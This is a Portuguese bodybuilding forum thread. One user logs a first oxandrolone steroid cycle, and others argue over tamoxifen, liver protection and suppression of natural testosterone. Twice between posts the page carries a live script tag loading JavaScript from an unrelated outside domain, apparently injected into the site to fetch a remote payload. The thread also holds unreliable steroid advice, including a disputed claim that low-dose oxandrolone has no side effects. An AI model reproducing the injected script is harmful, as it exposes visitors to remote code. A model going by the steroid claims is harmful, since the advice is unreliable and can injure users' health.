Ir para conteúdo
  • Cadastre-se

Relato 1ºciclo Oxandrolona Masc. C/ Fotos


Posts Recomendados

03/03 -> Pesei de manhã e bati os 85KG (cravados)!!!!!!!!!!!!!!!! :king_right: :king_right: :king_right: :king_right:

Já estava com 84kg e uns "quebrados" (geralmente ignoro os quebrados )

Dia tranquilo,me alimentando bem e me hidratando corretamente.
Treino de Costas e Bíceps hoje. Pump Monstro e muita força :D
Bíceps Vascularizou legal durante o treino :ohno02::ohno02:

Rins ainda fazem questão de lembrar que existem, isso pq fiquei apenas 02 dias sem tomar muuuuuuuita agua (ainda sim tomei bastante).
Ainda bem que não mandei a Creatina!!!! Hoje já tomei uns 4L de água.... não aguento mais mijaaaR!!!

Resumo do dia:

No treino: Força, Pump vascularização do bíceps
Prós: Força, muita fooorça no levantamento Terra! Pump monstro e vascularização no bíceps
Colaterais: Dor nos rins

Flw VLW!!!

Link para o comentário
Compartilhar em outros sites

Publicidade

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

protejer da hepatotoxidade e restabelecer a produção endogena de testo que é inibida com o uso da oxan.

Cara, proteção pra hepatoxidade seria algo pro fígado (Silimarina, Ornitargin etc)

Tamox não funciona como protetor, funciona como inbidor de estrógeno endógeno estimulando a secreção do GnRH e consequentemente a produção do FSH e LH.

Resumindo: Oxandrolona tem duas grandes vantagens quando comparada com outros esteróides anabolizantes. Ela pode não ser convertida em estrogênio e não influencia significativamente o eixo hipotálamo-hipófise em doses baixas. Por não se converter em estrogenio, os homens podem ficar despreocupados com o crescimento dos mamilos, já por não afetar o eixo hipotálamo-hipófise, a substância não tem efeitos catastróficos sobre a produção natural da testosterona. Isso significa que o indivíduo que consome Anavar, em doses baixas, fica livre de efeitos colaterais, tais como perda da libido ou impotência e atrofia testicular, efeitos que são comumente proporcionados por outros esteróides anabolizantes.

Resumindo dinovo: LEIA MAIS ANTES DE FALAR BESTEIRA, E SE NAO TEM CERTEZA, PESQUISE OU PErGUNTE AO INVÉS DE PASSAR INFORMAÇÕES ERRADAS.

Link para o comentário
Compartilhar em outros sites

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Cara, proteção pra hepatoxidade seria algo pro fígado (Silimarina, Ornitargin etc)

Tamox não funciona como protetor, funciona como inbidor de estrógeno endógeno estimulando a secreção do GnRH e consequentemente a produção do FSH e LH.

Resumindo: Oxandrolona tem duas grandes vantagens quando comparada com outros esteróides anabolizantes. Ela pode não ser convertida em estrogênio e não influencia significativamente o eixo hipotálamo-hipófise em doses baixas. Por não se converter em estrogenio, os homens podem ficar despreocupados com o crescimento dos mamilos, já por não afetar o eixo hipotálamo-hipófise, a substância não tem efeitos catastróficos sobre a produção natural da testosterona. Isso significa que o indivíduo que consome Anavar, em doses baixas, fica livre de efeitos colaterais, tais como perda da libido ou impotência e atrofia testicular, efeitos que são comumente proporcionados por outros esteróides anabolizantes.

Resumindo dinovo: LEIA MAIS ANTES DE FALAR BESTEIRA, E SE NAO TEM CERTEZA, PESQUISE OU PErGUNTE AO INVÉS DE PASSAR INFORMAÇÕES ERRADAS.

Pelo que eu já tinha lido no fórum me parecia o tamox além de prevenir a ginecomastia promovida pela aromatização de testo, ajudava na hepatotoxidade das drogas orais além de ajudar a estabelecer a produção endogena de testo.

Fui pesquisar um pouco mais agora e realmente não achei nenhuma informação confirmando sobre a proteção hepatotoxica e o boost na testo endógena.

Agora você tá de brincadeira comigo em me falar que a oxandrolona NÃO inibe o eixo de HPT e não inibe a produção endogena de testosterona. É OBVIO QUE INIBE CARALHO! Um ciclo de mais de 4 semanas de oxan com doses acima de 40mg/dia inibe sim o eixo e se não fizer uma tpc você corre risco SIM de ter seu eixo afetado pra sempre.

A oxandrolona é de fato muito mais branda do que qualquer outro anabolizante, mas isso não muda o fato dela ser uma droga e ser um anabolizante como qualquer outro. Quem usa a oxandrolona achando que não precisa fazer TPC e não precisa se preocupar com a inibição do eixo tá muito iludido com os prós que a oxandrolona leva sobre os outros anabolizantes.

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...